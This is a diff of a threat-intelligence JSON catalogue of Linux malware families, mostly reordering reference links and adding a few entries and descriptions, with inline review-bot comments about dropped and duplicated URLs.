- "https://pylos.co/2021/05/13/mind-the-air-gap/",
- "https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/",
- "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted",
- "https://twitter.com/GelosSnake/status/1451465959894667275",
- "https://blog.group-ib.com/blackmatter#",
- "https://www.ic3.gov/Media/News/2021/211101.pdf",
- "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
- "https://twitter.com/JAMESWT_MHT/status/1388301138437578757",
 "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/",
- "https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version",
- "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
- "https://blog.group-ib.com/blackmatter2",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
- "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
- "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/",
- "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims",
- "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/",
- "https://www.youtube.com/watch?v=NIiEcOryLpI",
- "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636",
+ "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
+ "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
 "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
- "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/",
+ "https://www.ic3.gov/Media/News/2021/211101.pdf",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/",
+ "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/",
+ "https://twitter.com/GelosSnake/status/1451465959894667275",
+ "https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version",
+ "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
+ "https://twitter.com/JAMESWT_MHT/status/1388301138437578757",
+ "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims",
+ "https://www.youtube.com/watch?v=qxPXxWMI2i4",
+ "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
+ "https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
 "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://blog.group-ib.com/blackmatter#",
+ "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636",
+ "https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/",
+ "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime",
+ "https://blog.group-ib.com/blackmatter2",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin",
+ "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
 "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
- "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group"
+ "https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
+ "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/",
+ "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html",
+ "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/",
+ "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted",
+ "https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212",
+ "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
+ "https://pylos.co/2021/05/13/mind-the-air-gap/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html",
+ "https://www.youtube.com/watch?v=NIiEcOryLpI",
+ "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/"
 ],
 "synonyms": [],
 "type": []
@@ -4333,11 +4494,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddg",
- "https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/",
+ "https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/",
 "https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/",
 "https://blog.netlab.360.com/ddg-botnet-round-x-is-there-an-ending/",
 "https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/",
- "https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/"
+ "https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/"
 ],
 "synonyms": [],
 "type": []
@@ -4364,9 +4525,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.deadbolt",
 "https://community.riskiq.com/article/1601124b",
- "https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html",
 "https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://www.bleepingcomputer.com/news/security/new-deadbolt-ransomware-targets-qnap-devices-asks-50-btc-for-master-key/"
+ "https://www.bleepingcomputer.com/news/security/new-deadbolt-ransomware-targets-qnap-devices-asks-50-btc-for-master-key/",
+ "https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html"
 ],
 "synonyms": [],
 "type": []
@@ -4379,8 +4540,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.denonia",
- "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/",
- "https://thehackernews.com/2022/04/first-malware-targeting-aws-lambda.html"
+ "https://thehackernews.com/2022/04/first-malware-targeting-aws-lambda.html",
+ "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/"
 ],
 "synonyms": [],
 "type": []
@@ -4393,9 +4554,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.derusbi",
+ "https://twitter.com/IntezerLabs/status/1407676522534735873?s=20",
 "https://attack.mitre.org/groups/G0001/",
- "https://attack.mitre.org/groups/G0096",
- "https://twitter.com/IntezerLabs/status/1407676522534735873?s=20"
+ "https://attack.mitre.org/groups/G0096"
 ],
 "synonyms": [],
 "type": []
@@ -4407,10 +4568,7 @@
 "description": "Dofloo (aka AESDDoS) is a popular malware used to create large scale botnets that can launch DDoS attacks and load cryptocurrency miners to the infected machines. ",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dofloo",
- "https://blog.syscall.party/post/aes-ddos-analysis-part-1/",
- "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf",
- "https://www.bleepingcomputer.com/news/security/exposed-docker-apis-abused-by-ddos-cryptojacking-botnet-malware/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dofloo"
 ],
 "synonyms": [
 "AESDDoS"
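Review bot: The Dofloo element loses three of its four references — the syscall.party AESDDoS analysis, the Botconf 2015 paper and the BleepingComputer write-up on exposed Docker APIs — leaving only the Malpedia link, while the description still summarizes the DDoS and cryptomining behaviour those sources documented. If the links were dropped because they no longer resolve, an archived copy would preserve the provenance; if this only mirrors an upstream change, saying so in the commit message would spare the next reader the same question. The Denonia and Derusbi hunks on this line only reorder refs.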
@@ -4426,8 +4584,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.doki",
 "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/",
- "https://www.securecoding.com/blog/all-about-doki-malware/"
+ "https://www.securecoding.com/blog/all-about-doki-malware/",
+ "https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/"
 ],
 "synonyms": [],
 "type": []
@@ -4449,20 +4607,33 @@
 "uuid": "a41d8c89-8229-4936-96c2-4b194ebaf858",
 "value": "DoubleFantasy (ELF)"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dreambus",
+ "https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "22ff8eac-d92e-4c6e-829b-9b565d90eddd",
+ "value": "DreamBus"
+ },
 {
 "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury",
- "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf",
- "https://csirt.gov.it/data/cms/posts/582/attachments/66ca2e9a-68cd-4df5-81a2-674c31a699c2/download",
- "https://security.web.cern.ch/security/advisories/windigo/windigo.shtml",
- "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/",
- "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/",
- "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/",
- "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy",
 "https://www.welivesecurity.com/2014/10/15/operation-windigo-good-job-eset-says-malware-author/",
- "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf",
+ "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/",
+ "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy",
+ "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/",
+ "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf",
+ "https://security.web.cern.ch/security/advisories/windigo/windigo.shtml",
+ "https://csirt.gov.it/data/cms/posts/582/attachments/66ca2e9a-68cd-4df5-81a2-674c31a699c2/download",
+ "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/"
 ],
 "synonyms": [],
 "type": []
@@ -4476,9 +4647,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot",
 "https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/",
- "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/",
+ "https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/",
 "https://blogs.akamai.com/sitr/2019/06/latest-echobot-26-infection-vectors.html",
- "https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada"
+ "https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada",
+ "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/"
 ],
 "synonyms": [],
 "type": []
@@ -4492,10 +4664,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.enemybot",
 "https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet",
+ "https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers",
 "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux",
 "https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/",
- "https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory",
- "https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers"
+ "https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory"
 ],
 "synonyms": [],
 "type": []
@@ -4522,8 +4694,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.esxi_args",
- "https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/",
 "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/",
+ "https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/",
 "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/",
 "https://www.youtube.com/watch?v=bBcvqxPdjoI"
 ],
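Review bot: The enemybot `refs` array on the new side still carries `https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/` and the same URL without the trailing slash as two separate entries, so the reorder preserved a duplicate instead of collapsing it. The hellokitty hunk has the same slash-only pair for the blog.sekoia.io vice-society article, and the kaiten hunk lists the lacework kek-security article under two different paths, which looks like the same page captured twice. A normalisation pass in the generator before emitting `refs` (strip the trailing slash, compare host case-insensitively) would remove these; if the distinct captures are deliberate, a comment in the generator saying so would stop reviewers from re-flagging them.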
@@ -4534,13 +4706,13 @@
 "value": "ESXiArgs"
 },
 {
- "description": "",
+ "description": "According to Infosec Institute, EvilGnome presents itself to unwitting Linux users as a legitimate GNOME extension. Legitimate extensions help to extend Linux functionality, but instead of a healthy boost in system functionality, EvilGnome begins spying on users with an array of functionalities uncommon for most Linux malware types.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome",
 "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
- "https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/"
+ "https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/",
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought"
 ],
 "synonyms": [],
 "type": []
@@ -4566,14 +4738,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel",
- "https://www.wired.com/story/sandworm-centreon-russia-hack/",
 "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
- "https://twitter.com/craiu/status/1361581668092493824",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
- "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
 "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
- "https://attack.mitre.org/groups/G0034"
+ "https://www.wired.com/story/sandworm-centreon-russia-hack/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://attack.mitre.org/groups/G0034",
+ "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
+ "https://twitter.com/craiu/status/1361581668092493824"
 ],
 "synonyms": [],
 "type": []
@@ -4614,9 +4786,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot",
 "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html",
- "https://blog.netlab.360.com/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/",
+ "https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html",
 "https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/",
- "https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html"
+ "https://blog.netlab.360.com/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/"
 ],
 "synonyms": [],
 "type": []
@@ -4629,9 +4801,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.finfisher",
+ "https://securelist.com/finspy-unseen-findings/104322/",
 "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
- "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/",
- "https://securelist.com/finspy-unseen-findings/104322/"
+ "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/"
 ],
 "synonyms": [],
 "type": []
@@ -4657,8 +4829,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fodcha",
- "https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/",
- "https://www.bleepingcomputer.com/news/security/fodcha-ddos-botnet-reaches-1tbps-in-power-injects-ransoms-in-packets/"
+ "https://www.bleepingcomputer.com/news/security/fodcha-ddos-botnet-reaches-1tbps-in-power-injects-ransoms-in-packets/",
+ "https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/"
 ],
 "synonyms": [],
 "type": []
@@ -4680,15 +4852,16 @@
 "value": "FontOnLake"
 },
 {
- "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk. ",
+ "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine\u2019s disk. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog",
- "https://www.akamai.com/blog/security/fritzfrog-p2p",
- "https://www.securityweek.com/sophisticated-fritzfrog-p2p-botnet-returns-after-long-break",
- "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/",
+ "https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/",
 "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.akamai.com/blog/security/fritzfrog-p2p",
+ "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/",
+ "https://www.securityweek.com/sophisticated-fritzfrog-p2p-botnet-returns-after-long-break"
 ],
 "synonyms": [],
 "type": []
@@ -4697,7 +4870,7 @@
 "value": "FritzFrog"
 },
 {
- "description": "",
+ "description": "Gitpaste-12 is a modular malware first observed in October 2020 targeting Linux based x86 servers, as well as Linux ARM and MIPS based IoT devices. It uses GitHub and Pastebin as dead drop C2 locations.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gitpaste12",
@@ -4714,8 +4887,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.glupteba_proxy",
- "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/",
- "https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html"
+ "https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html",
+ "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/"
 ],
 "synonyms": [],
 "type": []
@@ -4723,6 +4896,19 @@
 "uuid": "bcfec1d3-ff29-4677-a5f6-be285e98a9db",
 "value": "Glupteba Proxy"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gobrat",
+ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ddba032c-ebde-4736-b7ef-8376702dac6a",
+ "value": "GobRAT"
+ },
 {
 "description": "",
 "meta": {
@@ -4793,14 +4979,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime",
+ "https://par.nsf.gov/servlets/purl/10096257",
 "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/",
- "https://github.com/Psychotropos/hajime_hashes",
+ "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things",
+ "http://blog.netlab.360.com/hajime-status-report-en/",
+ "https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/",
 "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461",
 "https://x86.re/blog/hajime-a-follow-up/",
- "http://blog.netlab.360.com/hajime-status-report-en/",
- "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things",
- "https://par.nsf.gov/servlets/purl/10096257",
- "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf"
+ "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf",
+ "https://github.com/Psychotropos/hajime_hashes"
 ],
 "synonyms": [],
 "type": []
@@ -4839,8 +5026,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hand_of_thief",
- "https://blog.avast.com/2013/08/27/linux-trojan-hand-of-thief-ungloved/",
- "https://web.archive.org/web/20130815040638/https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thief-trojan-targets-linux-inth3wild/"
+ "https://web.archive.org/web/20130815040638/https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thief-trojan-targets-linux-inth3wild/",
+ "https://blog.avast.com/2013/08/27/linux-trojan-hand-of-thief-ungloved/"
 ],
 "synonyms": [
 "Hanthie"
@@ -4869,17 +5056,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hellokitty",
- "https://www.govinfosecurity.com/vice-society-ransomware-gang-disrupted-spar-stores-a-18225",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
 "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/",
- "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html",
 "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group",
- "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
 "https://www.bleepingcomputer.com/news/security/linux-version-of-hellokitty-ransomware-targets-vmware-esxi-servers/",
+ "https://www.govinfosecurity.com/vice-society-ransomware-gang-disrupted-spar-stores-a-18225",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
 "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
+ "https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire"
 ],
 "synonyms": [],
 "type": []
@@ -4892,6 +5079,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiatus_rat",
+ "https://blog.lumen.com/hiatusrat-takes-little-time-off-in-a-return-to-action/",
 "https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/"
 ],
 "synonyms": [],
@@ -4901,13 +5089,13 @@
 "value": "HiatusRAT"
 },
 {
- "description": "",
+ "description": "HiddenWasp is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiddenwasp",
 "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
- "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/"
+ "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/",
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought"
 ],
 "synonyms": [],
 "type": []
@@ -4920,15 +5108,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek",
- "https://blog.netlab.360.com/hns-botnet-recent-activities-en/",
- "https://blog.avast.com/hide-n-seek-botnet-continues",
- "https://threatlabs.avast.com/botnet",
- "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/",
- "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/",
 "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/",
+ "https://blog.netlab.360.com/hns-botnet-recent-activities-en/",
+ "https://threatlabs.avast.com/botnet",
+ "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/",
+ "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/",
 "https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html",
+ "https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/",
 "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/",
- "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/"
